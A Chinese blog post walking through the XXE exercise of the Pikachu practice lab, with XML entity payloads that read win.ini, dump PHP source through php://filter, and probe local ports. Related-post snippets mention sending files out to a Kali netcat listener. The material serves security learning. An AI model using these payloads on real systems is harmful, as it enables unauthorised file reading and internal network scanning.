pikachu--XXE

最新推荐文章于 2024-07-31 11:01:16 发布
最新推荐文章于 2024-07-31 11:01:16 发布
阅读量294 收藏 1
点赞数
分类专栏: pikachu 文章标签: php 数学建模 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/firecjh/article/details/131131404
版权

任务一:XXE

实验环境:

本地搭建pikachu

进入pikachu平台。进入XXE模块。点击XXE进入测试页面。

步骤:

  1. 分析源码。

  1. 查看系统文件内容。

<?xml version="1.0"?>

<!DOCTYPE note [

<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]>

<note>&xxe;</note>

3)查看PHP源代码。(文件路径以自己实际电脑为准)

可以用绝对路径:

<?xml version = "1.0"?>

<!DOCTYPE note [

<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=C:/phpstudy_pro/WWW/pikachu-master/vul/rce/rce.php"> ]>

<note>&xxe;</note>

也可以用相对路径:

<?xml version = "1.0"?>

<!DOCTYPE note [

<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=../rce/rce.php"> ]>

<note>&xxe;</note>

4)爆破开放端口。

尝试80端口:

<?xml version = "1.0"?>

<!DOCTYPE noet [

<!ENTITY xxe SYSTEM "http://127.0.0.1:80"> ]>

<note>&xxe;</note>

尝试81端口:

<?xml version = "1.0"?>

<!DOCTYPE noet [

<!ENTITY xxe SYSTEM "http://127.0.0.1:81"> ]>

<note>&xxe;</note>

设置模糊测试位置:

设置payload

查看结果

像雾若雨又如风
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu-master.zip
06-25
"Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让学习者在可控的环境中实践和测试各种安全攻防...
pikachu-master
05-04
将下载的pikachu-master压缩包解压到指定目录,如`/opt`: ``` sudo tar -zxvf pikachu-master.tar.gz -C /opt ``` 进入解压后的目录: ``` cd /opt/pikachu-master ``` 5. 配置Pikachu 使用文本编辑器...
pikachu--xxe
qq_43660551的博客
07-12 208
发现这里采用post方式传输数据,且没对xml参数进行过滤,simplexml_load_string()函数将用户传入的xml直接转换为SimpleXMLElement对象,故这里存在被篡改参数内容,造成xxe的漏洞。现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部实体内容的。写一个正经的xml。
Pikachu 靶场 XXE 通关解析
Flag少侠的博客
05-13 1126
XXE漏洞(XML External Entity Injection)是一种安全漏洞,存在于使用XML解析器的应用程序中。攻击者可以利用XXE漏洞来读取服务器上的任意文件、执行远程请求、进行内部端口扫描等操作,甚至可能导致服务器拒绝服务攻击。XXE漏洞的原理是利用应用程序对外部实体的解析支持。XML实体是可以引用外部资源(如文件或URL)的独立实体。当应用程序在解析XML时,如果未正确配置解析器或没有禁用外部实体的引用,攻击者可以构造恶意的XML实体来触发XXE漏洞。]>
Pikachu-XXE
baynk的博客
11-19 4022
0x00 XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从...
Pikachu--XXE漏洞
weixin_53736204的博客
07-25 1007
XML文档结构由XML声明,DTD(文档类型定义),文档元素三部分构成!--定义此文档是 note 类型的文档-->!ELEMENT--定义note元素有四个元素-->--定义to元素为"#PCDATA”类型-->!ELEMENT!ELEMENT--定义from元素为"#PCDATA”类型-->!ELEMENT--定义head元素为"#PCDATA"类型-->!ELEMENT--定义body元素为"#PCDATA"类型--></</</</</》》》XML特性《《《
pikachu--XXE漏洞
m0_63944205的博客
07-25 303
这里我们修改端口测试开放,如果一直转圈然后断开则端口不开放。输入上述代码,成功接收到我们的xml命令,测试成功。在输入框输入这里的代码,注意,一个字符都不能错.传入参数:外带file到kali8888端口。这里我们可以看到一个接受xml代码的输入框。这个文件的作用是将file的值传入kali。(1)我们看到username这里有回显,回显是username我们在这里修改。7,学会了吧,我们来实战一下。(3)发送到重放器得到结果。kali监听8888端口。(2)这里我们抓包试试。
pikachu-XXE
Cwillchris的博客
11-01 2669
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 尝试PHP协议,构造代码如下 <?xml version = "1.0"?> <!DOCTYPE note [ <!ENTITY hacker "xxe"> ]> <name>&hacker;</name> 输入,显示如下,能正常执行命令 ...
pikachu-XXE漏洞
ineedmoreMuQ的博客
07-25 255
你只要提交就可以获得被加码的数据然后自行解码即可!以上探测为网站有回显时的语句,那么一个网站若是没有回显我们该如何处理呢?这就需要神奇的base64编码出场了,加码调用解码即可观看秘密文件哦!我们在这一节需要掌握什么是xxe,具体请自行收集材料,博主也不清楚。我们应该首先搞一个服务器然后把文件我们输入的数据指向我们的服务器。众所周知php文件是不在前端显示的,如果我们想看怎么办呢。当你的元素内容是一个file协议,即可在回显处显示内容。但网站如果存在xxe漏洞的话,我们可以如下利用。这是我们要提交的数据。
pikachu-XXE(xml external entity-injection)
zhoumouren88的博客
02-02 153
部分图片来自于网络,如有侵权,请联系我及时删除~ 一、XXE的概念 1.1 什么是xml xml是一种可拓展的标记语言,可以用来存储数据,例如:我们经常看到一些.xml的文件;它还可以用来传输数据,我们可以直接将数据以xml的格式放在请求当中,发给服务器。 1.2 xml文档格式 1.3 simplexml_load_string() 函数功能:转换形式正确的XML字符串为SimpleXMLElement对象 注意:在PHP里边解析xml用的是libxml,它在≥2.9.0的版本中,默认是禁止解析...
pikachu-xxe漏洞
weixin_71053667的博客
07-25 116
文件在路径为"D:\phpstudy_pro\WWW\evil.dtd"1.模拟文件准备 在D盘根目录新建一个66.txt 文件中随便输入内容。4打开kali监听8886端口,命令为nc -lvvp 8888。查看文件:读取服务器/本地文件(事先创建一个文本文件)2.在www目录下新建一个my.dtd文件输入代码。代码中指定的IP地址为kali虚拟机的8888端口。查看回显:提交一个正常的xml数据。其中指定的IP地址为自己本机的ip。3、xml.txt文件的内容。6.解码后可查看内容。
Pikachu靶场通关笔记--XXE
weixin_45908624的博客
12-27 615
xxe
pikachu-master靶场
07-14
"pikachu-master靶场" 是一个专门为网络安全学习和实践设计的平台,它通常包含了一系列的挑战,旨在帮助用户提升其在黑客攻防、漏洞挖掘、安全防护等领域的技能。这个压缩包文件“pikachu-master”很可能包含了该...
RCE和php文件上传
m0_71332744的博客
07-30 835
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
53、PHP 实现归并排序
weixin_44010641的博客
07-30 332
【代码】53、PHP 实现归并排序。
WordPress原创插件:搜索引擎抓取首图seo图片
爱酷码的博客
07-29 519
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP一维数组怎么转关联数组
qq_32450471的博客
07-30 336
php是一门广泛应用于web开发的脚本语言。其强大的数组功能是其最重要的特征之一。在PHP中,数组是一个能够存储多个值的变量,并且这些值可以是任何类型的数据,比如整数、浮点数、字符串、布尔值、对象等等。此外,数组还可以分为索引数组和关联数组。本文主要介绍PHP中一维数组转关联数组的方法。
基于PHP+MySQL组合开发的微信活动投票小程序源码系统 带完整的安装代码包以及搭建部署教程
最新发布
codeji的博客
07-31 258
为了满足这一需求,我们推出了一款基于PHP+MySQL组合开发的微信活动投票小程序源码系统,旨在帮助用户快速搭建和管理投票活动。该系统采用了PHP作为后端开发语言,结合MySQL数据库进行数据存储和管理,确保了系统的稳定性和可扩展性。同时,通过优化数据库查询和索引设计,提高了数据处理的效率,确保了在大量用户同时参与投票时系统的稳定运行。同时,系统还支持多种交互方式,如分享、评论等,增强了用户的参与感和互动性。同时,管理员可以自定义投票选项、设定投票时间、限制投票次数等,确保活动的灵活性和公平性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值